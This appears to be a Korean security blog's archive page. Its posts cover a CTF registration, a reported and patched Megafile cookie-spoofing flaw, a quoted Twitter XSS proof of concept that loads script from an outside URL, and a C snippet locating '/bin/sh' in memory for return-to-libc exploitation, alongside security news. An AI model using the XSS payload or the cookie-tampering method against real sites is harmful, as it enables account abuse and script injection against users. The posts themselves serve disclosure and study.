smpctf 2010 등록

IT/Security/Event 2010. 7. 11. 00:41

시큐리티 캘린더를 보니, smpctf 일정이 있어서 일단 무턱대로 참여해보았습니다.
단 한번도 참여해보지도 않은 행사라 아직 관련 정보는 잘 모릅니다.
더구나 제가 쓰고있는 네트워크 망에서는 irc포트가 모두 막혀있어서 ssh 터널링으로 irc를 해야하는..
-_-;

ssh 가 타임아웃 되거나 끊기면 정말 귀찮아지더라고요.

아무튼 등록했습니다.

<그림 1> smpctf 2010 등록화면.
밑에 몇가지 입력하는 것이 더 있긴한데, 지면(?) 상 이정도로 자릅니다.

<그림 2> smpctf 2010 등록 완료 화면

등록 완료하였습니다. 역시나 우울하게 혼자서.. -_-;
즐거운 게임 되길 바랄뿐입니다. :)

// 바빠서 무턱대고 포스팅을 했었는데 실수로 쓰다말고 공개설정도 안해놨었네요. -_-;
// CTF가 열린 지금 포스팅을 다시 공개합니다.

설정

트랙백

댓글

메가파일 쿠키 스푸핑 취약점

IT/Security/Web 2010. 7. 9. 15:53

이틀 전 메가파일이 쿠키 스푸핑에 취약하다는 사실을 듣고 가입을 해보았습니다.
그리고 Cooxie 의 Cookie Edit 창을 열었는데, -_-;;

참 간만에 보는 문서에나 나올 법한 쿠키시스템. 한 눈으로도 취약한 상태라는 것을 직감할 수 있었습니다.

쿠키 설정은 아래와 같았습니다.

_dwiN=d-Nkr
_dwiF=d-Nkr|d|-|-|-|-|-|-|-|-|-|-|
_dwiV=d-Nkr14|1278630403|2|1|
_dwiC=d-Nkr14|102584a2|1278630401|1278630401|1278630401|1|
check_adultk=0 // 성인인증 체크루틴으로 보이나 별 역할은 없음
check_comic=general%7C0%7CAnow%7CAnow
check_level=general
login_level=3
login_name=Anow
login_check=d358f5400d1cad644accb535423ae193

login_loginid=Anow // 유저 ID. 이 곳에서 취약점이 발생한다.
login_id=2973222 // 유저 unique id
login_session=0804_c385000d9177111299207773d7295035 // 유저 세션값
login_email= // 유저 이메일
login_mn= // 주민등록번호
login_name2= // 유저 이름의 URL Encoding
national=1
login_agent=0



이렇게 구성되어 있습니다.

 login_loginid 파라미터가 취약합니다.
저 login_loginid 를 다른 유저 아이디로 교체해버리면 id 일부 권한을 획득할 수 있습니다.
완전히 획득하는 것은 아니고, 교체한 id의 포인트를 마음껏 쓸 수 있었습니다.

한 마디로 다른 사람 id가 보이는 대로 바꿔치기 해가면서 포인트를 마구 쓸 수 있다는 소리입니다.
더구나 판매자 아이디가 완전히 공개되어 있어 다른 사람 id를 알기는 완전 쉬웠습니다. -_-;

취약점을 알았으니 제보를 해야겠지요.
그런데 고객센터를 들러도 마땅히 제보할 메뉴가 없었습니다.
그래서 사이트 하단에 있는 admin [at] megafile.co.kr 에 해당 쿠키 취약성과 방안, 조언을 담아 메일을 보냈습니다.
그리고 웬지 확인을 안하거나 메일이 전달되지 않는 경우를 생각해서(실제로 hotmail이 잘 전달이 안되는 경우가 있더라고요.)
고객센터에 위의 주소로 메일 보냈다고 따로 적어놨습니다.

20분만에 이런 메일을 받을 수 있었습니다.

<그림 2> 메가파일 운영진의 답장 메일

헐.. -_-;; 기분이 굉장히 좋기도 하면서 놀랐습니다. 여태까지 제보한 곳들 중에서 가장 메일 확인도 빨랐고,
거기다가 보상까지 받은 적은 처음이네요. 그 보상이 과연 무엇인지 잠시 생각해보았는데,
아마도 메가파일 내에서의 item 정도라고 생각이 되어 로그인을 해보았습니다.


<그림 3> 운영진으로부터 받은 보상


캐시 3만원이었습니다. 보니깐 반드시 돈을 질러야 충전이 가능한 item 이던데,
평소에 P2P를 구글에서 자료찾다가 rapidshare를 쓰는 경우 이외에는 토렌트도 쓰질 않아서 저에게는 전혀 쓸모가 없는(-_-;)
보상이긴했으나, 운영진의 빠른 응답과 마음 씀씀이가 정말 고마웠습니다. 그랬기에 더욱 뿌듯했었네요.

더욱 기분이 좋았던 것은, 관련 취약점이 그 즉시 모두 패치되었다는 사실이었습니다.

사실 이런 분류의 취약점은 매우 파악하기가 쉽기 때문에, 해킹에 대해서 거의 문외한인 script-kid 이더라도
쉽게 악용이 가능해서, 많은 피해사례가 지속되어왔을 것 같은데,
(메가파일 이라는 웹하드를 예전부터 가끔씩 들어온 것을 생각 해보면 꽤 많은 시간동안 취약했었네요.)
아무튼 이렇게 바로 패치되어 정말 기쁘네요.

캐시 3만원은 나중에 정말 급한 일이 생길 때 아니면 기념품(?) 으로 고이 모셔놔야겠네요.
아무튼 난생 처음으로 보상받은.. -_-; 좋은 경험이었습니다.


'IT/Security > Web' 카테고리의 다른 글

about:blank 가 다른 페이지로 표시될 때  (1) 2014.07.10
Twitter.com XSS 취약점 공개  (0) 2010.06.25

설정

트랙백

댓글

Twitter.com XSS 취약점 공개

IT/Security/Web 2010. 6. 25. 15:59

TwitterXSS 취약점이 인도네시아 해커 H4x0r-x0x 에 의해 발견되었습니다.
해당 취약점은 예전에 생각해보았던 취약점이었는데, 테스트 해보지 않았던게 아쉽네요. :(
어찌되었던 그동안 XSS와 CSRF 취약점에 한참 시달려오던 Twitter 은 이번에도 예외없이 보안문제로 질타를 받게될 것 같습니다.

문제는 이렇습니다.

<그림 1> Script 가 실행 가능한 구역인 Application Name 필드


바로 저 곳에서 XSS 취약점이 발생한다는 것인데, web에서 작성한 트윗이니 web으로 찍히겠지요. 저기에 직접 스크립트를 삽입하기 위해서는 Application 등록을 해야하는데, 트위터의 개발자 센터의 새 어플리케이션 등록 [ http://dev.twitter.com/apps/new ] 에서 Application Name 을 기입할 때 XSS 코드의 Injection 이 가능합니다.


<그림 2> 어플리케이션 등록 화면. Application Name 에서 Code Injection 이 가능하다.


취약점을 발표한 H4x0r 은 다음과 같은 PoC를 공개했습니다.
<span>via <a href="http://www.0wn3d-5ys.co.cc" rel="nofollow">Ub­­&shy;erTw­i­&shy;tter<span
style="visibility: hidden"&gt; <script src='http://is.gd/cWO66' type='text/javascript'&gt;</script&gt;</a>
</span>

 
스크립트 삽입이 가능해지면서 공격자의 Party 는 열리게 됩니다. :)

결론적으로, 이번 XSS 취약점은 대부분의 경우가 그렇지만,
"사용자 입력 검증 루틴이 부실했기 때문이다" 라고 이야기할 수 있겠습니다.


보다 자세한 정보는 아래의 링크를 참고해주세요.
[
http://praetorianprefect.com/archives/2010/06/persistent-xss-on-twitter-com/ ]

'IT/Security > Web' 카테고리의 다른 글

about:blank 가 다른 페이지로 표시될 때  (1) 2014.07.10
메가파일 쿠키 스푸핑 취약점  (13) 2010.07.09

설정

트랙백

댓글

ASCII-Hex Table

IT/Security/System 2010. 6. 4. 07:26


여태까지 보아오던 ASCII-Hex 테이블 중 가장 보기 편했던 표인 것 같습니다... ^^;

설정

트랙백

댓글

ARM 디컴파일러 출시!

IT/Security/System 2010. 6. 4. 07:11

<그림 1> ARM 디컴파일러가 2010/06/03 날짜로 출시되었다. 


Hex-Rays ARM Decompiler v1.0 Comparison Page

Welcome to the Hex-Rays ARM Decompiler v1.0 comparison page! Below you will find side-by-side comparisons of disassembly and decompiler. Please maximize the window too see both columns simultaneously.




역시 Hex-Rays 입니다. ARM Decomplier 가 출시되었네요.

자세한 정보는 [ http://www.hex-rays.com/hexarm_compare0.shtml ] 를 참고해보시길 바랍니다.

설정

트랙백

댓글

리눅스 메모리 구조에 관한 간략한 설명

IT/Security/System 2010. 5. 11. 17:51

======================================================================================================

리눅스에서는 바이너리 실행파일의 형식으로 ELF(Executable and Linking Format) 형식을 사용한다.
리눅스 커널에서 ELF형식의 바이너리가 메모리에 로드되는 방식은 binfmt_elf.c에 들어있다.
binfmt_elf.c 에 보면 메모리 구조는 대략적으로 아래의 그림과 같이 4가지의 영역으로 구분 된다.

우선 텍스트(Text) 영역은 프로그램의 어셈블리 코드가 저장된다.
텍스트 영역공유라이브러리와 기계어 코드가 저장 된다.
데이터(Data) 영역전역(Global) 데이터들이 저장된다.
힙(Heap) 영역동적 변수가 사용하는 영역으로
C 언어에서
malloc()과 같은 시스템 호출을 통해서 할당되는 메모리는 힙 영역에 할당된다. 스택 영역은 지역변수(local)가 사용하는
영역이다.

스택은 사용자 주소 공간의 최상위 부분에 위치하며, LIFO(Last In, First Out) 모델에 따라 동작한다.
함수가 호출될 때마다 지역 변수와 함수의 인자, 리턴어드레스 등을 위한 새로운 프레임이 스택에 생성되는데
CPU는 값을 집어넣는 push 연산과 값을 꺼내는 pop 연산을 통하여 스택을 제어한다. 

======================================================================================================

예전에 어떤 논문을 보고 잠시 기록해놨던 내용인데, 정확히 어떤 논문이었는지를 모르겠네요.. -_-;
암튼 깔끔하게 잘 정리되어 있어서 스크랩했던 부분입니다. 참고하시길 바라겠습니다.

'IT/Security > System' 카테고리의 다른 글

ASCII-Hex Table  (0) 2010.06.04
ARM 디컴파일러 출시!  (0) 2010.06.04
Ubuntu 10.04 Beta2 설치기  (0) 2010.04.22
/bin/sh 주소를 찾을 때  (0) 2010.03.17
gcc 2.96에서 buf와 buf2의 거리표  (0) 2010.03.14

설정

트랙백

댓글

대체 뭐가 다를까?

IT/Security/Anti Virus 2010. 5. 11. 17:35


예전 스크린 샷들을 뒤지다보니.. 이게 나왔네요.
집에 있는 데스크탑에서.. 2009년도 12월 23일 날짜에 검출된 내역인데,
역시 백신들은 nc를 많이 싫어하네요..ㅎㅎㅎ;

아무튼.. 조금 황당해서.. 찍어놓은 듯 싶습니다.
대소문자 차이...음...-_-)a

설정

트랙백

댓글

KISA 제 7회 해킹방어대회 개최

IT/Security/Event 2010. 4. 26. 18:57

한국인터넷진흥원에서는 해킹사고에 대한 대응능력 향상을 위해
다음과 같이 「제7회 해킹방어대회」를 개최합니다.

참가대상 및 방법

  • 참가대상 : 정보보호에 관심있는 자로 4인 이하의 팀을 구성하여 신청
  • 참가신청기간 : 4월 26일(월) ~ 5월 12일(수) 오후 6시까지
  • 참가신청방법 : 접수기간 동안 홈페이지를 통해 신청(http://hdcon.kisa.or.kr)
  • 기타 문의처 : hdcon@kisa.or.kr

대회 내용

  • 개요
    - 주최 : 방송통신위원회
    - 주관 : 한국인터넷진흥원
  • 예선 대회
    - 5. 14(금) ~ 15(토), 온라인에서 단계별 문제풀이 방식으로 진행하여 본선 진출팀 선정
  • 본선 대회
    - 6. 10(목), 잠실 롯데호텔 3층
    - 각 문제의 난이도별로 배점하고 획득한 점수의 합이 가장 높은 팀 순으로 순위 결정
  • 참여 행사
    - 일반인들을 대상으로 본선대회 시 현장에서 신청/참여하는 Open CTF 대회 동시 진행

시상 내용

  • 최우수상(방송통신위원장상) : 상금 1,000만원 및 상장(1팀)
  • 우수상(한국인터넷진흥원장상) : 상금 400만원 및 상장(2팀)
  • 장려상(한국인터넷진흥원장상) : 상금 200만원 및 상장(2팀)


참여하실 분들은 참여하시길..

설정

트랙백

댓글

Ubuntu 10.04 Beta2 설치기

IT/Security/System 2010. 4. 22. 21:30

설치 환경 : VMWare7.0

디자인이 뭔가 몽환(?) 스러워졌다. 점점 Ubuntu가 Mac OS화 되어간다는 느낌입니다.

아래는 설치 화면입니다.


좀 더 깔끔해지기 보다는 디자인 구성이 설치 화면 부터 많이 바뀌었습니다.
이제는 깔끔함도 한계에 부딪혔는지, 눈에 확 들어오는 구성이 디자인 경쟁의 주력이 될 듯 싶네요.




아래는 로그인 화면입니다. 간단간단...


점점 정말 Mac OS 와 비슷해져갑니다. Windows 와의 경쟁 구도 가운데에 리눅스가 엄청나게 성장한 것이 느껴집니다.
조금만 더 보완한다면 GUI 모델링에서도 뒤쳐지지 않을 엄청난 저력을 발휘할 듯 싶습니다.


심심해서 바꿔본 기본 바탕화면 세팅입니다. 시원시원한 이미지들이 꽤 많이 있습니다.

보통 터미널에서만 작업하느라 GUI 모드는 거의 접하지 않는 편인데, 네트워크 세팅하면서 GUI를 사용하니 훨씬 편하더군요. GUI도 중요 기능들을 알아놓으면 굉장히 쓸만한 toolkit 인 것 같습니다.

Beta2 라고 하니.. 정식 버젼은 어떨까요. 갈수록 기대되는 우분투 배포판입니다.

'IT/Security > System' 카테고리의 다른 글

ARM 디컴파일러 출시!  (0) 2010.06.04
리눅스 메모리 구조에 관한 간략한 설명  (0) 2010.05.11
/bin/sh 주소를 찾을 때  (0) 2010.03.17
gcc 2.96에서 buf와 buf2의 거리표  (0) 2010.03.14
bfd.h 가 없을 경우  (0) 2010.03.14

설정

트랙백

댓글

/bin/sh 주소를 찾을 때

IT/Security/System 2010. 3. 17. 14:23

int main(int argc, char **argv)
{
        long shell;
        shell = 0x4006b498;  // <=== system()함수의 주소
        while(memcmp((void*)shell,"/bin/sh",8)) shell++;
        printf("\"/bin/sh\" is at 0x%x\n",shell);
}

'IT/Security > System' 카테고리의 다른 글

리눅스 메모리 구조에 관한 간략한 설명  (0) 2010.05.11
Ubuntu 10.04 Beta2 설치기  (0) 2010.04.22
gcc 2.96에서 buf와 buf2의 거리표  (0) 2010.03.14
bfd.h 가 없을 경우  (0) 2010.03.14
dumpcode.h  (0) 2010.03.14

설정

트랙백

댓글